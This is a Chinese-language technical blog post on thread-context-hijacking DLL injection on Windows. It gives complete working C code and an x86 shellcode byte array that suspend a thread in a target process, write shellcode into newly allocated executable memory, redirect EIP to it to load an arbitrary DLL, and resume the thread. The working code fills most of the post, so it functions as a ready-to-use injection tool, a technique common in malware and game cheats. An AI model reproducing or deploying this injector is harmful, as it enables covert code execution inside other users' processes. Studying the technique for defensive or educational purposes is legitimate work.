修改线程上下文注入DLL
来源:互联网 发布:网游客户端编程 编辑:程序博客网 时间:2024/05/18 01:04
一、注入原理
获取目标进程的某个线程,暂停之,获取线程上下文,分配虚拟内存,写入ShellCode,修改上下文结构EIP指向ShellCode,设置上下文,恢复线程,就这么简单。
二、完整代码
DWORD injectThreadContext( HWND hWindow, const char * lpszDllPath ){DWORDdwProcessID= 0;DWORDdwThreadID= 0;unsigned char shellcode[] = {0x68, 0x00, 0x00, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xD0, 0x83, 0xC4, 0x04, 0xE9, 0x00, 0x00, 0x00, 0x00,0x55,0x8B,0xEC,0x60,0x9C,0x83,0xEC,0x28,0xB9,0x0A,0x00,0x00,0x00,0xB8,0xCC,0xCC,0xCC,0xCC,0x8D,0x7D,0xB4,0xF3,0xAB,0x6A,0x00,0x68,0x61,0x72,0x79,0x41,0x68,0x4C,0x69,0x62,0x72,0x68,0x4C,0x6F,0x61,0x64,0x64,0xA1,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,0x14,0x8B,0x00,0x8B,0x70,0x28,0x80,0x7E,0x0C,0x33,0x75,0xF5,0x8B,0x40,0x10,0x8B,0xF8,0x03,0x7F,0x3C,0x8B,0x7F,0x78,0x03,0xF8,0x8B,0xDF,0x8B,0x53,0x20,0x03,0xD0,0xC7,0x45,0xB4,0x00,0x00,0x00,0x00,0x8B,0xF5,0x83,0xEE,0x5C,0x8B,0x4D,0xB4,0x8B,0x3C,0x8A,0x03,0xF8,0x83,0x45,0xB4,0x01,0xB9,0x0C,0x00,0x00,0x00,0xF3,0xA6,0x75,0xE6,0x8B,0x7B,0x24,0x03,0xF8,0x8B,0x4D,0xB4,0x8B,0x0C,0x4F,0x81,0xE1,0xFF,0xFF,0x00,0x00,0x8B,0x7B,0x10,0x2B,0xCF,0x8B,0x7B,0x1C,0x03,0xF8,0x8B,0x3C,0x8F,0x03,0xC7,0x8B,0x5D,0x08,0x53,0xFF,0xD0,0x83,0xC4,0x38,0x9D,0x61,0x8B,0xE5,0x5D,0xC3};dwThreadID = GetWindowThreadProcessId( hWindow, &dwProcessID );HANDLEhProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwProcessID );if ( NULL == hProcess )return GetLastError();HANDLEhThread = OpenThread(THREAD_ALL_ACCESS, FALSE, dwThreadID);if ( NULL == hThread ){CloseHandle(hProcess);return GetLastError();}SuspendThread( hThread );CONTEXT stcContext = { CONTEXT_FULL };if ( FALSE == GetThreadContext( hThread, &stcContext ) ){CloseHandle( hThread );CloseHandle( hProcess );return GetLastError();}LPVOID lpMem = VirtualAllocEx( hProcess, NULL, 1024, MEM_COMMIT, PAGE_EXECUTE_READWRITE );if ( NULL == lpMem ){CloseHandle( hThread );CloseHandle( hProcess );return GetLastError();}SIZE_T nWrite = 0;SIZE_T nSizeOfShellCode = sizeof(shellcode);LPVOID lpCode = lpMem;LPVOID lpDllName = (LPVOID)( (DWORD)lpCode + nSizeOfShellCode + 5 );*((PDWORD)(shellcode + 1)) = (DWORD) lpDllName;*((PDWORD)(shellcode + 6)) = (DWORD)lpCode + 20;*((PDWORD)(shellcode + 16)) = stcContext.Eip - ( (DWORD)lpCode + 15 ) - 5;WriteProcessMemory( hProcess, lpCode, shellcode, nSizeOfShellCode, &nWrite );WriteProcessMemory( hProcess, lpDllName, lpszDllPath, strlen(lpszDllPath), &nWrite );stcContext.Eip = (DWORD)lpCode;SetThreadContext(hThread, &stcContext);ResumeThread(hThread);CloseHandle( hThread );CloseHandle( hProcess );return 0;}int _tmain(int argc, _TCHAR* argv[]){const char * lpszDll= "asm_dll.dll";const char * lpszWindowName = "无标题 - 记事本";// [ LordPE Deluxe ] by yodaHWND hWindow = FindWindowA( NULL, lpszWindowName );if ( hWindow == NULL ){printf( "找不到指定窗口: %s \r\n", lpszWindowName );return 0;}DWORD dwRet = injectThreadContext( hWindow, lpszDll );printf( "injectThreadContext ret: %d \r\n", dwRet );}
三、注解
1、ShellCode还是用的上一篇文章的 http://blog.csdn.net/antihips/article/details/53020750,调用方式稍作改造:
push lpszDllPathmov eax, ShellCodecall eaxadd esp, 0x4
整个代码结构就是:
调用者
ShellCode
名称字符串
注意:这里我们需要修正 dll 路径名称,ShellCode 地址,JMP回去的地址
2、查找目标进程,获取进程ID,线程ID,打开之
3、暂停线程,获取线程上下文,分配虚拟内存
4、修正 ShellCode 中的地址,写入到虚拟内存,修改线程上下文 EIP。
5、把线程上下文设置回去,恢复线程。
四、效果
0 0
- 修改线程上下文注入DLL
- R3修改线程上下文EIP实现的无模块注入
- R3修改线程上下文EIP实现的无模块注入
- Dll注入-远线程注入
- 远程线程dll注入
- 远程线程DLL注入
- DLL线程注入思路
- 远线程DLL注入
- 远程线程注入dll
- 线程注入dll
- DLL 远程线程注入
- 创建远程线程注入DLL
- DLL注入 之线程劫持
- 建远程线程注入DLL
- 创建远程线程注入DLL
- 利用远程线程注入DLL
- 创建远程线程注入DLL
- 远线程DLL注入技术
- freemarker常见的一些用法(一)
- 安装CDH5.7.1集群
- easyui data-options的使用以及避免重复提交
- OpenStack 通用技术有哪些
- android_Edittext 两位小数输入,可用于价格计算器
- 修改线程上下文注入DLL
- 主机连不上虚拟机数据库
- win7活动窗口不能显示到最前端
- Wikioi 1138 聪明的质检员
- Python初级学习笔记
- Hibernate总结(转载)
- Java中的static与final关键字的作用
- [MFC]如何让窗口全屏
- UILable缩进、行间距设置、边框